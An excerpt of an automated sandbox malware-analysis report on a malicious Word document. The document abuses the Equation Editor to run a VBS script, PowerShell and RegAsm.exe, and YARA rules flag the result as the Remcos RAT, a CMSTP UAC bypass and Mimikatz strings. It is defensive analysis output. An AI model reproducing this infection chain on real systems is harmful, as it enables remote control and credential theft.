                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004167EF
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00214D5011_2_00214D50
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00214D4011_2_00214D40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043706A12_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041400512_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E11C12_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004541D912_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004381E812_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041F18B12_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044627012_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E34B12_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004533AB12_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042742E12_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043756612_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E5A812_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004387F012_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043797E12_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004339D712_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044DA4912_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427AD712_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041DBF312_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427C4012_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00437DB312_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00435EEB12_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043DEED12_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00426E9F12_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1001719412_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1000B5C112_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B04013_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043610D13_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044731013_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044A49013_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040755A13_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043C56013_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B61013_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044D6C013_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004476F013_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B87013_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044081D13_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041495713_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004079EE13_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407AEB13_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044AA8013_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00412AA913_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404B7413_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404B0313_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044BBD813_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404BE513_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404C7613_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00415CFE13_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00416D7213_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00446D3013_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00446D8B13_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00406E8F13_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040503814_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041208C14_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004050A914_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040511A14_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043C13A14_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004051AB14_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044930014_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040D32214_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A4F014_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041363114_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044669014_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A73014_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004398D814_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004498E014_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A88614_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DA0914_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00438D5E14_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449ED014_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041FE8314_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00430F5414_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004050C215_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004014AB15_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040513315_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004051A415_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040124615_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040CA4615_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040523515_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004032C815_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040168915_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402F6015_2_00402F60
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: bhv71A7.tmp.13.drBinary or memory string: org.slneighbors
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@16/32@8/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rwwstCMd.docxJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCG
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7944.tmpJump to behavior
                    Source: xrrwwstCMd.docxOLE indicator, Word Document stream: true
                    Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
                    Source: xrrwwstCMd.docxOLE document summary: title field not present or empty
                    Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.drOLE document summary: author field not present or empty
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.drOLE document summary: edited time not present or 0
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....................$.......j>.........................s............X...............p...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....................$.......n>.........................s............X...............................Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.414064781.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: xrrwwstCMd.docxReversingLabs: Detection: 13%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
